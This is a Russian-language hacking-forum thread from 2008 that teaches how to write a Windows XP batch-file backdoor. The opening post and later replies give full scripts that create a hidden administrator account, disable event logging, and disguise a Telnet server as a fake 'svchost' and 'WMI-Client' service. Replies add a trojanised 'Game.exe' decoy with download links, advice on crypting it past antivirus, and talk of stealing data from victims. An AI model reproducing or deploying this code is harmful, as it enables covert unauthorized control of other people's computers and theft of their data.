Пишем полноценный бэкдор за 10 минут.

Тема в разделе "Локальный взлом", создана пользователем Koller, 5 июн 2008.

  1. Koller
    Koller Guest
    Публикуется с разрешением автора
    ------------------------------------------------------------------------
    Что же такое бэкдор, мы можем очень подробно прочитать тут.
    Вкратце, с помощью "задней дверцы" мы можем полностью управлять компьютером. Бэкдоры различаются, похоже, только степенью навороченности - некоторые предлагают нам только перезагружать компьютер жертвы, когда нам захочется; а иные даже умеют отправлять скриншоты с компьютера жертвы. Соответственно, и пишут их на разных языках.

    Но мы же с тобой не хацкоры, которые привыкли держать в страхе весь район страшными словами "троян"; иначе говоря, нам не нужен крутой графический интерфейс админки для бэкдора. Нам достаточно и командной строки, чтобы управлять удалённым компьютером.
    Итак, сегодня мы пишем собственный бэкдор длинной в 20 строчек! От слов, как всегда, к делу.

    Сначала решим, как мы хотим подключаться к заражённой машине. В консоле я не нашёл альтернативы команде telnet. Сразу придётся немного разочароваться, так как на WinVista этой фишки нет. Наш дор будет работать только под Win XP.

    Для начала отключим все выводимые в процессе выполнения батника на экран подсказки. вообще, эта строчка не несёт никакой смысловой нагрузки, я просто показываю, какой я чоткий проггер =)
    Код:
    0:  @echo off
    Далее создадим локальную группу, куда в последствии добавим пользователя с правами администратора и паролем pass:
    Код:
    1:   net localgroup TelnetClients /add
    2:   net user admin pass /add
    3:   net localgroup Administratoren admin /add
    4:   net localgroup TelnetClients admin /add
    Итак, мы уже обосновались на машине. Теперь необходимо, чтобы компьютер был доступен нам и после перезагрузки. Для этого создадим где-нибудь подальше, чтобы не палевно было, файл регистра 0.reg, в котором укажем помимио всего остального и номер порта в 16-ричной системе, к которому будем впоследствии коннектиться:
    Код:
    5:   cd /d %windir%\system32
    6:   ECHO Windows Registry Editor Version 5.00>0.reg
    7:   ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>0.reg
    8:   ECHO "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>>0.reg
    9:   ECHO "TelnetPort"=dword:000003F2>>0.reg
    10:  ECHO "MaxConnections"=dword:0000000a>>0.reg
    11:  ECHO "EventLoggingEnabled"=dword:00000000>>0.reg
    12:  ECHO "DisconnectKillAllApps"=dword:00000000>>0.reg
    13:  ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\ReadConfig]>>0.reg
    14:  ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\Defaults]>>0.reg
    Импортируем наш свежесозданный файл в реестр, и тут же его удалим.
    Код:
    15:  regedit /s 0.reg && DEL 0.reg
    Теперь нам необходимо обжиться в системе самим телнет-сервером, который мы скопируем и назовём svchost.exe.

    [Q]: Стоп, свцхост? В этой папке же уже лежит служба "Generic Host Process for Win32 Services"?
    [A]: Ы, не палимся! Для этого добавим в конце расширения пробел и сассоциируем это расширение с исполняемыми файлами (ехе). После этого создаем службу под именем WMI-Client, которая при запуске системы будет запускать наш svchost.exe. Делаем ей описание "Microsoft WMI-Client" и, наконец, запускаем её.
    Код:
    16:  COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeя"
    17:  assoc .exeя=exefile
    18:  sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeя" start= auto
    "svchost.exeя" /service
    19:  sc description WMI-Client "Microsoft WMI-Client"
    20:  sc start WMI-Client
    После этого, как уже говорилось в начале статьи, мы можем приконнектиться к компьютере-жертве посредством Телнета такой командой.
    Код:
    telnet 127.0.0.1 1010
    В принципе, как мы видим, ничего не стоить немного изменить наш бэкдор. Переименуем названия файлов, сделаем коннект на другой порт, добавим пару ненужных параметров в регистре. Расширение у файла поменяем.
    ================================================== ===========
    Напоследок, даю линк на скачку билдера бэкдора, который Вы сможете подсунуть Вашей жертве.
    [​IMG]
    BAT Backdoor для Windows XP Professional. Программа представляет собой
    генератор bat-бэкдора: вводите логин, пасс, порт и получаете backdoor.bat

    скачать (rapidshare.com)
    скачать (ifolder.ru)
    скачать (webfile.ru)
    ================================================== ===========​
    PS / thx за 5ую строчку кода vos
    Mega respect Tr3x0r
    (c) mr.grek
     
    5 июн 2008
    1 человеку нравится это.
  2. =<4APAEV>=
    =<4APAEV>= Guest
    Вместо "я" пробел ставим ?
     
    5 июн 2008
  3. Koller
    Koller Guest
    Всё как написано, так и должно быть...в сорсах ошибок нет
     
    5 июн 2008
  4. R@Z[]R
    R@Z[]R Guest
    Koller,вот у мя такая трабла: решили проверить на компе у дружбана, всё сделали, у4етка появилась, но вот проблема в том 4то она не админская, а с ограни4енными правами(( Хотя вводил следующее:

    net localgroup TelnetClients /add
    net user admin pass /add
    net localgroup Administratoren admin /add
    net localgroup TelnetClients admin /add


    Ну естественно поменяв admin на своего юзера и pass на нужный мне))


    з.ы.Написал в асю,если не сложно откликнись ;)
     
    Последнее редактирование модератором: 2 авг 2009
    15 июл 2008
  5. [.]d0T
    [.]d0T Guest
    во-первых, не понятно, с какой целью тут вообще создается локальная группа TelnetClients.
    во-вторых, Administratoren (скорее всего из какой-то локализованной версии Windows), нужно использовать наименование группы для конкретной локализации. К примеру: Администраторы (для русской винды), Administrators (для английской).
    в-третьих, группа TelnetClients не имеет никаких прав на компьютере жертвы, незачем заносить в нее пользователя admin, достаточно лишь занести admin'a в локальную группу администраторов.
     
    16 июл 2008
  6. Iceberg
    Iceberg Guest
    Было бы не плохо, что б кто то взялся объяснить как все это сделать из под Линукса..
     
    23 июл 2008
  7. R@Z[]R
    R@Z[]R Guest
    Думаю 4то когда жертва перезапустит комп она увидит нового юзера, и удалит его, 4то озна4ает:Наш повторный путь на комп закрыт, поэтому я думаю 4то пользователя надо скрыть, ну как гостя например, для этого нужно в реестре по адресу HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon\ SpecialAccounts\ UserList\ добавить клю4 типа REG_DWORD, соответствующий имени пользователя. Присвоив этому клю4у значение 1 мы разрешим показывать этого пользователя в Welcome Screen, а 0 запретим. И если это дописать в бэкдор4ик, то будет еще красивее смотреться)))А в целом крута)))
     
    3 сен 2008
  8. R@Z[]R
    R@Z[]R Guest
    Вот: Маленько модернизировал код:

    @echo off
    @start %windir%/system32/spider.exe
    net localgroup TelnetClients /add
    net user Admin 123456 /add
    net localgroup ¤¬ЁЁбва в®ал Admin /add
    net localgroup TelnetClients Admin /add
    Windows Registry Editor Version 5.00 > C:\System.reg
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> C:\System.reg
    "Admin"=dword:00000000 >> c:\System.reg
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>> c:\System.reg
    "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>> c:\System.reg
    "TelnetPort"=dword:00006987>> c:\System.reg
    "MaxConnections"=dword:0000000A>> c:\System.reg
    "EventLoggingEnabled"=dword:00000000>> c:\System.reg
    "DisconnectKillAllApps"=dword:00000000>> c:\System.reg
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\ReadConfig]>> c:\System.reg
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\Defaults]>> c:\System.reg
    regedit /s c:\System.reg && DEL c:\System.reg
    COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeя"
    assoc .exeя=exefile
    sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeя" start= auto
    "svchost.exeя" /service
    sc description WMI-Client "Microsoft WMI-Client"
    sc start WMI-Client



    Теперь нашего пользователя видно не будет,4то тоже делает еще меньше палева,ну и наконец 4тоб жертва хоть 4е та видела при запуске бэка ,я вписал в код автозапуск стандартной игрухи))
    Все зато4ено под окна ХР))
    Юзаем))

    З.Ы. если надо кому выложу полностью готовую версию(скомпилированую в .exe,и с ярлыком игрушки этой)))
     
    Последнее редактирование модератором: 2 авг 2009
    17 ноя 2008
  9. R@Z[]R
    R@Z[]R Guest
    Сорри,не все как обещал(( зна4ек поменен)))и теперь это самораспоковывающийся архив)))распакуется в папку с виндой) и от туда сам запустится,эт проканает на большинстве обы4ных юзеров)))если нет,придумай другой способ как спрятать файлик) а,вот и он сам: _http://letitbit.net/download/8628a3194773/Game.exe.html

    Настройки бэка: Порт 27015 пользователь HelpAsistant Пароль Root, максимальное 4исло конектов 10
     
    Последнее редактирование модератором: 2 авг 2009
    18 ноя 2008
    1 человеку нравится это.
  10. -CONCORD-
    -CONCORD- <b></b> Модератор
    Симпатии:
    4
    перезалил..
    _http://slil.ru/26348373
    _http://ifolder.ru/9155214
    _http://rapidshare.com/files/165299120/Game.exe.html
    _http://depositfiles.com/files/29g1rt7io
    _http://openfile.ru/128895/

    з.ы. на свой трах и риск.
     
    Последнее редактирование: 19 ноя 2008
    19 ноя 2008
  11. Mu$limu$
    Mu$limu$ Новичок
    Симпатии:
    0
    У мну пишется что такой группы нет, нельзя ли учётку записывать в администраторы, и ещё каспер спалил процесс, криптовать можно его или нет?
     
    27 ноя 2008
  12. R@Z[]R
    R@Z[]R Guest
    Ну ваще единственый недостаток это то 4то, пользователь с правами админа создается не всегда(((,хотя нам админ далеко не обязателен.....Криптовать можно,но желательно приватным криптором
     
    27 ноя 2008
  13. Николашка
    Николашка Новичок
    Симпатии:
    0
    а как пароли с помощью него украсть???
     
    2 дек 2008
  14. onthar
    onthar Продвинутый
    Симпатии:
    224
    Николашка,
    руками. каков вопрос - таков ответ.
     
    2 дек 2008
  15. R@Z[]R
    R@Z[]R Guest
    Всё зависит от твоей фантазии....ты попадаеш на нужную тебе машину,а дальше подумай как и какие данные тебе можно оттуда слить,и главное,4уствуй себя там как дома,ведь если ты зашла на 4ужой комп то он по4ти полностью тебе доступен.
     
    7 дек 2008
  16. onthar
    onthar Продвинутый
    Симпатии:
    224
    zigmunt,
    да. посмотрев на код можно было самому легко догадаться.
     
    10 дек 2008
  17. виндовз
    виндовз Новичок
    Симпатии:
    0
    поправка на ветер.
    в Висте ЕСТЬ telnet. только мелко-мягкие посчитали, что он там по умолчанию - не нужен. Архаизм, мать его так!
    чтобы в висте врубить телнет - панель управления - программы и компоненты - включение и отключение компонентов виндовз - телнет
    включаем и радуемся.
    есть мнение, что данный бэкдор - на висте заработает прекрасно, но - это лишь мнение. проверять пока времени особо нет.
     
    27 дек 2008
  18. R@Z[]R
    R@Z[]R Guest
    Кстати да,на с4ет висты...... я его там не проверял,времени нету( если кому то придется столкнуться с использованием бэка на висте,отпишитесь;)

    p.s. у мя виста ни разу не стояла, поэтому сделано все под XP
     
    12 апр 2009
  19. taboo
    taboo Новичок
    Симпатии:
    0
    Net-Rat
    справляется лучше.
    но за инфу спасибо
     
    18 апр 2009
  20. nightserg
    nightserg Новичок
    Симпатии:
    0
    перезалейте по возможности
     
    8 апр 2011
Загрузка...